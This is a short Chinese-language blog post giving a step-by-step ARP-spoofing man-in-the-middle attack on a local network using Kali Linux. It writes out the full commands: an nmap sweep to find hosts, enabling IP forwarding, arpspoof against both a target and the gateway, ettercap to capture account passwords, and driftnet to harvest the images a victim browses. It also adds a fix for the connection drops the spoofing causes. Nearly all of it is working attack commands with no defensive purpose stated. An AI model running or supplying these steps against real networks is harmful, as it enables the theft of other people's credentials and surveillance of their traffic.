kali arp中間人攻擊
阿新 • • 發佈:2018-11-09
先用nmap找到目標(或zenmap等等)
nmap -sP 192.168.0.1-200
192.168.0.105 //(主機A 我自己的電腦)
echo 1 > /proc/sys/net/ipv4/ip_forward //進行IP轉發(echo 0即斷網)
arpspoof -i <<span class="hljs-name">網絡卡名>
-t <<span class="hljs-name">欺騙的目標> <<span class="hljs-name">我是誰>
【
arpspoof -i eth0 -t 192.168.0.105 192.168.0.1
// 終端1, 欺騙主機A :我是閘道器
arpspoof -i eth0 -t 192.168.0.1 192.168.0.105
//終端2, 欺騙閘道器:我是主機 A
】
用 ettercap抓取賬號密碼
開啟一個新終端
ettercap -Tq -i eth0
用driftnet獲取目標主機的圖片瀏覽記錄
driftnet -i eth0
(eth0為我的筆記本內建網絡卡名稱 USB網絡卡名稱一般為wlan0)
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.0.105 192.168.0.1
欺騙時仍造成斷網。
解決辦法。把靶機ip和閘道器反一下。
通過欺騙閘道器可以拿到圖片,至於賬號密碼能不能拿到要看登陸的網站了。